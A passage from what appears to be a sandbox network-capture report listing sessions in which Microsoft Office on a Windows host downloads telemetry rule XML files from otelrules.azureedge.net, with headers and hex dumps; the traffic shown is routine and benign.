                                                                                                                                                                              2024-11-21 07:31:00 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              111192.168.2.64985013.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:31:01 UTC192OUTGET /rules/rule701150v1s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:31:01 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:31:01 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 1364
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                              ETag: "0x8DC582BE1223606"
                                                                                                                                                                              x-ms-request-id: dcdca57e-b01e-003e-0dcb-3b8e41000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073101Z-r1d97b9957789nh9hC1TEBxha80000000a500000000096mu
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:31:01 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              112192.168.2.64984913.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:31:01 UTC192OUTGET /rules/rule701151v1s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:31:01 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:31:01 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 1401
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                                                              ETag: "0x8DC582BE055B528"
                                                                                                                                                                              x-ms-request-id: 07391f24-a01e-0032-508c-3a1949000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073101Z-178bfbc474bq2pr7hC1NYCkfgg000000019g0000000070qm
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:31:01 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              113192.168.2.64986113.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:31:02 UTC192OUTGET /rules/rule700401v2s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:31:02 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:31:02 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 1403
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                              ETag: "0x8DC582BDCB4853F"
                                                                                                                                                                              x-ms-request-id: eb1e057a-b01e-0097-688c-3a4f33000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073102Z-1777c6cb754lv4cqhC1TEB13us0000000ar000000000byh3
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:31:02 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              114192.168.2.64985813.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:31:02 UTC192OUTGET /rules/rule702201v1s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:31:02 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:31:02 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 1397
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT
                                                                                                                                                                              ETag: "0x8DC582BE7262739"
                                                                                                                                                                              x-ms-request-id: e7fe902a-801e-0067-6164-3bfe30000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073102Z-178bfbc474btvfdfhC1NYCa2en000000017g000000007dyv
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:31:02 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              115192.168.2.64986013.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:31:02 UTC192OUTGET /rules/rule702200v1s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:31:02 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:31:02 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 1360
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                              ETag: "0x8DC582BDDEB5124"
                                                                                                                                                                              x-ms-request-id: b47886c8-201e-00aa-0c8c-3a3928000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073102Z-r1d97b99577ckpmjhC1TEBrzs00000000a30000000006vkg
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:31:02 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              116192.168.2.64986313.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:31:03 UTC192OUTGET /rules/rule700400v2s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:31:03 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:31:03 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 1366
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                                                                                                              ETag: "0x8DC582BDB779FC3"
                                                                                                                                                                              x-ms-request-id: 5a6b30d1-101e-00a2-7c5b-3b9f2e000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073103Z-178bfbc474bpnd5vhC1NYC4vr4000000018g0000000001g3
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:31:03 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              117192.168.2.64986413.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:31:03 UTC192OUTGET /rules/rule700351v1s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:31:03 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:31:03 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 1397
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                              ETag: "0x8DC582BDFD43C07"
                                                                                                                                                                              x-ms-request-id: 4b825c62-901e-008f-3f5c-3b67a6000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073103Z-178bfbc474bxkclvhC1NYC69g4000000013g000000007d89
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:31:03 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              118192.168.2.64987213.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:31:04 UTC192OUTGET /rules/rule700350v1s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:31:04 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:31:04 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 1360
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                              ETag: "0x8DC582BDD74D2EC"
                                                                                                                                                                              x-ms-request-id: 6d560277-a01e-0050-158c-3adb6e000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073104Z-r1d97b99577n4dznhC1TEBc1qw0000000a60000000000qtu
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:31:04 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              119192.168.2.64987413.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:31:04 UTC192OUTGET /rules/rule703900v0s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:31:04 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:31:04 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 1390
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                                                                                                                                              ETag: "0x8DC582BE3002601"
                                                                                                                                                                              x-ms-request-id: 99b43a4d-701e-003e-13dc-3b79b3000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073104Z-r1d97b995774n5h6hC1TEBvf840000000a0g000000007tb2
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:31:04 UTC1390INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 53 3d
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              120192.168.2.64987313.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:31:04 UTC192OUTGET /rules/rule703901v0s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:31:04 UTC494INHTTP/1.1 200 OK
